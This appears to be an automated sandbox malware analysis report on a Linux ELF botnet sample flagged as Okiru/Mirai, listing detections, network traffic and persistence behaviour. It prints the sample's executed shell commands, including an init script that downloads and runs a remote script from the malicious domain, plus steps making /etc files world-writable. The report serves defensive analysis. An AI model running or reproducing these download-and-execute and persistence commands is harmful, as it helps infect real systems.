Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:	x86_32.nn.elf
Analysis ID:	1522875
MD5:	cda42956d6213c465b6876502ce3cfa6
SHA1:	cdd2d1950ddd18b78b8f9c78c777e04eabc9ef6a
SHA256:	d99d10559f1ad6bba1b59913604e261a613daa94af01ade8276effd692b5c03f
Tags:	elfpen-gorillafirewall-suuser-JAMESWT_MHT
Infos:

Detection

Okiru

Score:	88
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Okiru

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Machine Learning detection for sample

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: x86_32.nn.elf

ReversingLabs: Detection: 52%

Machine Learning detection for sample

Source: x86_32.nn.elf

Joe Sandbox ML: detected

Found strings indicative of a multi-platform dropper

Source: x86_32.nn.elf

String: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/null 2>&1which lldb > /dev/null 2>&1which dtrace > /dev/null 2>&1which truss > /dev/null 2>&1which ptrace > /dev/null 2>&1LD_PRELOADLD_LIBRARY_PATHLD_AUDIT/procw/etc/motd%s

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8
Source: global traffic	TCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8
Source: global traffic	TCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.13:58110 -> 45.202.35.64:199
Source: global traffic	TCP traffic: 192.168.2.13:54738 -> 154.216.17.220:38241
Source: global traffic	TCP traffic: 192.168.2.13:56664 -> 91.92.246.113:38241
Source: global traffic	TCP traffic: 192.168.2.13:50898 -> 93.123.85.166:38241

Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp, x86_32.nn.elf.32.dr, profile.12.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr	String found in binary or memory: http://pen.gorillafirewall.su/
Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp	String found in binary or memory: http://pen.gorillafirewall.su/lol.sh

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/nu

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 792, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 1944, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 3181, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 3185, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 5469, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 5483, result: successful	Jump to behavior

Yara signature match

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal88.spre.troj.evad.linELF@0/9@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_32.nn.elf (PID: 5461)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5474)	File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinary	Jump to behavior
Source: /usr/bin/ln (PID: 5481)	File: /etc/rc.d/S99x86_32.nn.elf -> /etc/init.d/x86_32.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5472)	File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5477)	File: /etc/init.d/x86_32.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/x86_32.nn.elf (PID: 5463)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5468)	Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5473)	Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5475)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_32.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_32.nn.elf'\n /tmp/x86_32.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_32.nn.elf'\n killall x86_32.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_32.nn.elf"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5476)	Shell command executed: sh -c "chmod +x /etc/init.d/x86_32.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5478)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5480)	Shell command executed: sh -c "ln -s /etc/init.d/x86_32.nn.elf /etc/rc.d/S99x86_32.nn.elf >/dev/null 2>&1"	Jump to behavior

Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 5472)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinary			Jump to behavior
Source: /bin/sh (PID: 5477)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/x86_32.nn.elf			Jump to behavior

Executes the "mkdir" command used to create folders

Source: /bin/sh (PID: 5479)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Executes the "systemctl" command used for controlling the systemd system and service manager

Source: /bin/sh (PID: 5464)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Sample tries to set the executable flag

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5472)	File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5477)	File: /etc/init.d/x86_32.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Writes shell script file to disk with an unusual file extension

Source: /tmp/x86_32.nn.elf (PID: 5461)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinary	Jump to dropped file
Source: /tmp/x86_32.nn.elf (PID: 5461)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5475)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x86_32.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/init.d/mybinary			Jump to dropped file
Source: /bin/sh (PID: 5475)	File: /etc/init.d/x86_32.nn.elf			Jump to dropped file

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 5461, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 5461, type: MEMORYSTR

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
154.216.17.220	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
45.202.35.64	unknown	Seychelles	139086	ONL-HKOCEANNETWORKLIMITEDHK	false
91.92.246.113	unknown	Bulgaria	34368	THEZONEBG	true
93.123.85.166	unknown	Bulgaria	43561	NET1-ASBG	true

Contacted Domains

Name	IP	Active
daisy.ubuntu.com	162.213.35.24	true

Name	Type	MD5	SHA1	SHA256
/boot/bootcmd	ASCII text	D5DB4EC5C3C9BFDFD44B7F5427D49CA9	01FD800DB5E7944D3010FB86B0E0588924EDB093	DE9A87BB9A34A519DD7861938F313301E286710ADD2B296F4D872C66BA7997D8
/etc/init.d/mybinary	POSIX shell script, ASCII text executable	466DE828478288FDF224B176571B2002	CFFAC9450F41EC7424DA96438312B2B09F7B6DE2	8D60C87876A0E3E951B2DCCBE35748A2E29F852EEE4B6120F7B9A38608EB9C7B
/etc/init.d/x86_32.nn.elf	POSIX shell script, ASCII text executable	2DA9F8D13F431B30517C28B331E6E3E8	3DF63D87E78BFD76188917E8F2F8445D45712031	F497495EAB7ABDEFDB7405B4EA2F61CF89C254F152BDB97DF69FA79CE0304C6E
/etc/inittab	ASCII text	6AF7192CE0D50EE37BE1D660B1A4154A	F25DBA081E9AD849FF36B5DB32F98F9301C3B21D	8AE6DAFBFAFC00CBDF4A536A0F01575ACA10663C4A11C4422ED0F8237D3A98AF
/etc/motd	ASCII text	2BD9B4BE30579E633FC0191AA93DF486	7D63A9BD9662E86666B27C1B50DB8E7370C624FF	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
/etc/profile	ASCII text	E2CB35DEAFFC26022920FED0C4D644F8	D28FD4B62009DBD6EEE5A3BE16B77F2E774C585C	425276C53A5A864E0E55FA203D5F6CD1BB2184D9A25CAD352C90D7024486580C
/etc/rc.local	POSIX shell script, ASCII text executable	3E2B31C72181B87149FF995E7202C0E3	BD971BEC88149956458A10FC9C5ECB3EB99DD452	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
/etc/systemd/system/custom.service	ASCII text	06D1F69FF613E4A6172919F3019F3B93	414E2ACAC0E86BD68C4423B5D5F7A6ABBA33259E	AF1B4A72507A102742F46D9939604855EB67D3E35521765EB6106CE48EDC332D
/memfd:snapd-env-generator (deleted)	ASCII text	D86A1F5765F37989EB0EC3837AD13ECC	D749672A734D9DEAFD61DCA501C6929EC431B83E	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45

AV Detection

Multi AV Scanner detection for submitted file

Source: x86_32.nn.elf

ReversingLabs: Detection: 52%

Machine Learning detection for sample

Source: x86_32.nn.elf

Joe Sandbox ML: detected

Found strings indicative of a multi-platform dropper

Source: x86_32.nn.elf

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8
Source: global traffic	TCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8
Source: global traffic	TCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.13:58110 -> 45.202.35.64:199
Source: global traffic	TCP traffic: 192.168.2.13:54738 -> 154.216.17.220:38241
Source: global traffic	TCP traffic: 192.168.2.13:56664 -> 91.92.246.113:38241
Source: global traffic	TCP traffic: 192.168.2.13:50898 -> 93.123.85.166:38241

Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
